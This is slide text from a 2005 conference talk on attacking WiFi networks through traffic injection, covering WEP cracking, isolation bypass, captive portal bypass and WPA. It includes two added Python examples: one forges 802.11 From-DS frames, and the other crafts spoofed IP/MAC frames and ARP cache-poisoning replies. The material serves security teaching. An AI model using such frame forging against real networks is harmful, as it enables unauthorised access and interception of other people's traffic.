Attacking WiFi With Traffic Injection Cedric Blancher
Cédric BLANCHER
EADS Corporate Research Center Rstack Team
EADS/CCR/DCR/SSI http://sid.rstack.org/
Ruxcon 2005
Sydney - Australia
2005 October 1-2
http://ruxcon.org.au/
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101
Attacking WiFi networks
WPA, WPA2 and 802.11i
Conclusion
Bibliography
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Introduction
Introduction
Of 802.11 traffic injection
802.11 keypoints
802.11 security
(1) No, it does not stand for Weak Encryption Protocol :)
Toolkit
Disclaimer :)
Management traffic
Tampering
Management traffic
Injection
Management traffic
Rogue APs (1/2)
Management traffic
Rogue AP (2/2)
Joker
WEP cracking
WEP basics
WEP cracking
Attacks overview
WEP cracking
IV collisions
WEP cracking
Cleartext attack
Authentication bypass
WEP cracking
Modified frame injection
This means you can inject arbitrary layer 2-consistent WEP frames and have them decrypted...
WEP cracking
Arbitrary injection consequences
WEP cracking
Fluhrer, Mantin and Shamir attack
WEP cracking
Korek Chopchop attack
WEP cracking
Devine aircrack/aireplay WEP cracking
WEP cracking
So WEP is weak, but still in France...
WEP cracking
And in the US ?
Attacking stations
What about associated stations ?
Attacking stations
Station to station traffic prevention (isolation)
With PSPF, stations can't talk to each other... No From-DS frame, so no communication (a)
[Figure: Batman sends a frame To = Robin, To-DS = 1, to the Access Point; it is not delivered to Robin (X)]
(a) Does not work between 2 APs linked via wired network
Attacking stations
Isolation bypass with injection
[Figure: Joker, Robin]
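An added example (not from the talk, and not Wifitap's code) of what the two isolation slides describe, in Python with constructed MAC addresses: a minimal 802.11 data frame builder and parser following the To-DS/From-DS address table, a model of an AP that with PSPF refuses to re-emit a To-DS frame towards another of its own wireless clients, and a station receive filter that accepts a From-DS frame carrying its BSSID whoever actually transmitted it. Joker builds that From-DS frame himself, which is the bypass. ap_relays and station_accepts are simplified models written for this example, not driver or vendor logic.

```python
import struct


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


# Constructed addresses for the example (not from the talk).
BATMAN = mac("00:11:22:33:44:55")
ROBIN = mac("00:11:22:33:44:66")
JOKER = mac("00:11:22:33:44:77")
BSSID = mac("00:aa:bb:cc:dd:ee")

FC_DATA = 0x08               # frame control byte 0: type = data, subtype 0, version 0
TO_DS, FROM_DS = 0x01, 0x02  # flag bits in frame control byte 1


def build_data_frame(da, sa, bssid, payload, to_ds, from_ds, seq=0):
    """Three-address 802.11 data frame. Which address goes where depends on the
    To-DS/From-DS bits (802.11 address table); WDS four-address frames are out of scope."""
    flags = (TO_DS if to_ds else 0) | (FROM_DS if from_ds else 0)
    if not to_ds and not from_ds:      # ad hoc / direct
        a1, a2, a3 = da, sa, bssid
    elif to_ds and not from_ds:        # station -> AP
        a1, a2, a3 = bssid, sa, da
    elif from_ds and not to_ds:        # AP -> station: the frame an injector forges
        a1, a2, a3 = da, bssid, sa
    else:
        raise ValueError("four-address frames not handled")
    header = struct.pack("<BBH", FC_DATA, flags, 0) + a1 + a2 + a3 + struct.pack("<H", seq << 4)
    return header + payload


def parse_data_frame(frame: bytes) -> dict:
    """Inverse mapping: recover DA/SA/BSSID from the three addresses and the DS bits."""
    fc0, flags, _duration = struct.unpack_from("<BBH", frame, 0)
    if fc0 & 0x0C != 0x08:
        raise ValueError("not a data frame")
    to_ds, from_ds = bool(flags & TO_DS), bool(flags & FROM_DS)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if not to_ds and not from_ds:
        da, sa, bssid = a1, a2, a3
    elif to_ds and not from_ds:
        bssid, sa, da = a1, a2, a3
    elif from_ds and not to_ds:
        da, bssid, sa = a1, a2, a3
    else:
        raise ValueError("four-address frames not handled")
    return {"to_ds": to_ds, "from_ds": from_ds, "da": da, "sa": sa, "bssid": bssid,
            "payload": frame[24:]}


def ap_relays(frame, bssid, wireless_clients, pspf):
    """Simplified AP model (an assumption of this example): a To-DS frame for its BSSID is
    re-emitted as a From-DS frame, except that with PSPF the AP never emits a From-DS
    frame towards another of its own wireless clients. Returns the relayed frame or None."""
    f = parse_data_frame(frame)
    if not f["to_ds"] or f["bssid"] != bssid:
        return None
    if pspf and f["da"] in wireless_clients:
        return None
    return build_data_frame(f["da"], f["sa"], bssid, f["payload"], to_ds=False, from_ds=True)


def station_accepts(frame, own_mac, bssid):
    """Simplified station receive filter (also an assumption): a From-DS data frame for my
    MAC carrying my BSSID is accepted. Nothing tells the station whether the AP or a
    monitor-mode card (Joker) actually transmitted it."""
    f = parse_data_frame(frame)
    return f["from_ds"] and f["da"] == own_mac and f["bssid"] == bssid


def demo():
    payload = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"ping?"  # LLC/SNAP + stand-in payload
    # 1. Batman -> Robin through an AP running PSPF: nothing comes back out of the AP.
    via_ap = build_data_frame(ROBIN, BATMAN, BSSID, payload, to_ds=True, from_ds=False)
    relayed = ap_relays(via_ap, BSSID, {BATMAN, ROBIN}, pspf=True)
    # 2. Joker injects himself the From-DS frame the AP refused to send.
    injected = build_data_frame(ROBIN, JOKER, BSSID, payload, to_ds=False, from_ds=True)
    return relayed is None, station_accepts(injected, ROBIN, BSSID)
```

The point of the model is in station_accepts: the only things a client checks are the DS bits, addr1 and the BSSID, all of which the injector chooses. This is also why the footnote on the previous slide holds: the PSPF decision lives in one AP, so two APs bridged over the wire never see each other's clients as "wireless" and forward normally.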
Attacking stations
Traffic tampering with injection
Tampering traffic
Quick demo...
Download Wifiping/Wifidns at
http://sid.rstack.org/index.php/Wifitap_EN
Attacking stations
Full communication with injection
Attacking stations
Proof of concept : Wifitap
Attacking stations
Wifitap in short
Attacking stations
Quick demo...
Download Wifitap at
http://sid.rstack.org/index.php/Wifitap_EN
IP address sorting
[Figure: Batman, Joker, Access Point, Firewall]
ARP cache poisoning and IP spoofing
See my LSM 2002 talk [BLA02], arp-sk website [ARPS] or MISC3 [MISC]
[Figure: Joker spoofs Batman IP; all traffic to Batman IP goes to Joker]
Hint: IP layer and MAC layer
[Figure: Joker spoofs Batman MAC _and_ IP; all traffic to Batman IP goes to Joker] (3)
(3) Side effect: tools like arpspoof won't work
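An added Python example (not the talk's code; arp-sk is not reproduced) of the captive portal slides, with constructed addresses: a portal that sorts authenticated clients by source IP only, one that binds IP and MAC, the two spoofing cases against them, and an ARP reply crafted so that a naive ARP cache sends Batman's return traffic to Joker. The frame builders produce raw bytes with a correct IPv4 header checksum, so the same bytes could be handed to an injector.

```python
import socket
import struct


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


# Constructed addresses for the example (not from the talk).
BATMAN_MAC, BATMAN_IP = mac("00:11:22:33:44:55"), "10.0.0.10"
JOKER_MAC, JOKER_IP = mac("00:11:22:33:44:77"), "10.0.0.20"
FW_MAC, FW_IP = mac("00:aa:bb:cc:dd:01"), "10.0.0.1"
ETH_IP, ETH_ARP = 0x0800, 0x0806


def ethernet(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    return dst + src + struct.pack("!H", ethertype) + payload


def ipv4_checksum(header: bytes) -> int:
    """Ones' complement sum of 16-bit words; over a valid header the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4(src: str, dst: str, payload: bytes, proto: int = 17) -> bytes:
    """Minimal IPv4 header (no options) with a correct checksum."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    header = header[:10] + struct.pack("!H", ipv4_checksum(header)) + header[12:]
    return header + payload


def arp_reply(sender_mac: bytes, sender_ip: str, target_mac: bytes, target_ip: str) -> bytes:
    """Ethernet/ARP 'is-at' reply. Sent by Joker with sender_ip=BATMAN_IP and
    sender_mac=JOKER_MAC this is the cache-poisoning message."""
    arp = struct.pack("!HHBBH6s4s6s4s", 1, ETH_IP, 6, 4, 2, sender_mac,
                      socket.inet_aton(sender_ip), target_mac, socket.inet_aton(target_ip))
    return ethernet(target_mac, sender_mac, ETH_ARP, arp)


def source_of(frame: bytes):
    """(source MAC, source IP) of an Ethernet/IPv4 frame: what a portal can sort on."""
    if frame[12:14] != struct.pack("!H", ETH_IP):
        raise ValueError("not an IPv4 frame")
    return frame[6:12], socket.inet_ntoa(frame[26:30])


class CaptivePortal:
    """Firewall in front of the AP. bind_mac=False sorts on IP only;
    bind_mac=True also ties the IP to the MAC seen at authentication time."""
    def __init__(self, bind_mac: bool = False):
        self.bind_mac = bind_mac
        self.allowed = set()

    def authenticate(self, client_mac: bytes, client_ip: str) -> None:
        self.allowed.add((client_mac, client_ip) if self.bind_mac else client_ip)

    def allows(self, frame: bytes) -> bool:
        src_mac, src_ip = source_of(frame)
        return ((src_mac, src_ip) if self.bind_mac else src_ip) in self.allowed


class ArpCache:
    """Naive cache that trusts any ARP reply, which is what cache poisoning relies on."""
    def __init__(self):
        self.table = {}

    def learn(self, frame: bytes) -> None:
        if frame[12:14] != struct.pack("!H", ETH_ARP):
            return
        opcode = struct.unpack("!H", frame[20:22])[0]
        if opcode == 2:
            self.table[socket.inet_ntoa(frame[28:32])] = frame[22:28]

    def resolve(self, ip: str):
        return self.table.get(ip)


def demo():
    """Batman authenticates; Joker then tries the cases from the slides."""
    to_internet = ipv4(BATMAN_IP, "192.0.2.1", b"GET / HTTP/1.0\r\n\r\n", proto=6)
    ip_only, ip_mac = CaptivePortal(), CaptivePortal(bind_mac=True)
    for portal in (ip_only, ip_mac):
        portal.authenticate(BATMAN_MAC, BATMAN_IP)
    spoof_ip = ethernet(FW_MAC, JOKER_MAC, ETH_IP, to_internet)      # Joker spoofs Batman IP
    spoof_both = ethernet(FW_MAC, BATMAN_MAC, ETH_IP, to_internet)   # ... MAC _and_ IP
    fw_cache = ArpCache()
    fw_cache.learn(arp_reply(BATMAN_MAC, BATMAN_IP, FW_MAC, FW_IP))  # legitimate entry
    fw_cache.learn(arp_reply(JOKER_MAC, BATMAN_IP, FW_MAC, FW_IP))   # poisoned by Joker
    return {
        "ip_only_passes_spoofed_ip": ip_only.allows(spoof_ip),
        "ip_mac_passes_spoofed_ip": ip_mac.allows(spoof_ip),
        "ip_mac_passes_spoofed_both": ip_mac.allows(spoof_both),
        "return_traffic_for_batman_goes_to": fw_cache.resolve(BATMAN_IP),
    }
```

Binding the MAC to the IP at the portal stops the first case and nothing else: both addresses are chosen by the sender of a frame, so the IP+MAC portal passes spoof_both just as the slide's "Hint" says. The ARP half only matters when Joker keeps his own MAC and still wants Batman's replies.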
WPA
(4) Robust Security Network
WPA/WPA2
Some flaws already ?
So what ?
Conclusion
What we can see
Conclusion
What we should see
Greetings to...
Bibliography
[WTAP] Wifitap, http://sid.rstack.org/index.php/Wifitap_EN
[ISCD] ISC Handler's Diary, http://isc.sans.org/diary.php?date=2005-06-26